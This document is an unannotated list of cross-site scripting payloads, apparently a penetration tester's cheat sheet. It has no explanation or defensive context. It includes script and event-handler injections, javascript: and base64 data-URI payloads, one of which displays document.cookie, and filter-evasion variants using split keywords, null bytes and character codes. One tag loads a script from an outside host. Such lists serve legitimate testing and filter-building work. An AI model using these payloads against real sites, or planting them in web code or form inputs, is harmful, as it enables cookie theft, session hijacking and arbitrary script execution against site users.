<script>type="text/javascript">alert ('Xss')</script> "><img src=x onerror=confirm('xss by evan');> "><script>alert(String.fromCharCode(88, 83, 83, 32, 98, 121, 32, 69, 118, 97, 110, 95, 80, 111, 112, 117, 112))</script> "><script x src=//0x.lv?</style></script><script>alert(String.fromCharCode(120, 115, 115, 32, 98, 121, 32, 101, 118, 97, 110 ))</script> "><IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG onmouseover="alert('xxs')"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav
ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out <IMG SRC="  javascript:alert('XSS');"> javascript:alert("XSS") "><img src=x onerror=prompt(0);> "><img src=x onerror=prompt("xss/by/evan")>
"><A HREF="http://www.google.com">
Robinhood:0x00
</A>
";confirm('XSS')//244 '+prompt(0)+' </SCRIPT>">'><SCRIPT>alert(88,83,83))</SCRIPT> <ScRipt>prompt(0)</ScRiPt> "><script>alert(0)</script><" --></style></script><script>alert(1)</script> "></TITLE><SCRIPT>alert("XSS by Evan");</SCRIPT> ">XSS<script>alert(document.domain)</script> "><img src="a" onerror="javascript:alert(document.domain)"> <img src=x onerror=prompt(3); "><Script>+alert('Robinhood:0x00')</script> "></script><svg/onload='-/"/-[Image().src=/http:\/\/shazzer.co.uk\/x/.source.replace(/\\/gi,[])]//'> "><script>location.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah";</script>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
<input onfocus=write(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//></video>
<body onscroll=alert(1)>
...
<input autofocus>
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>XSS</button>
<video onerror="alert(1)"><source><form><button formaction="javascript:alert(1)">XXS</button> <body oninput=alert(1)><input autofocus> <math href="javascript:alert(404)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math> <frameset onload=alert(1)>
<img src=x onerror=alert(1)//"> <comment><img src="</comment><img src=x onerror=alert(1)//">
<![><img src="]><img src=x onerror=alert(1)//"> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>
<style><img src="</style><img src=x onerror=alert(1)//">
<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> <b <script>alert(1)//</script>0</script>
<img[a][b]src=x[d]onerror[c]=[e]"alert(1)"> <a href="[a]java[b]script[c]:alert(1)">XXX</a> <script>({0:#0=alert/#0#/#0#(0)})</script> <script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script> <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>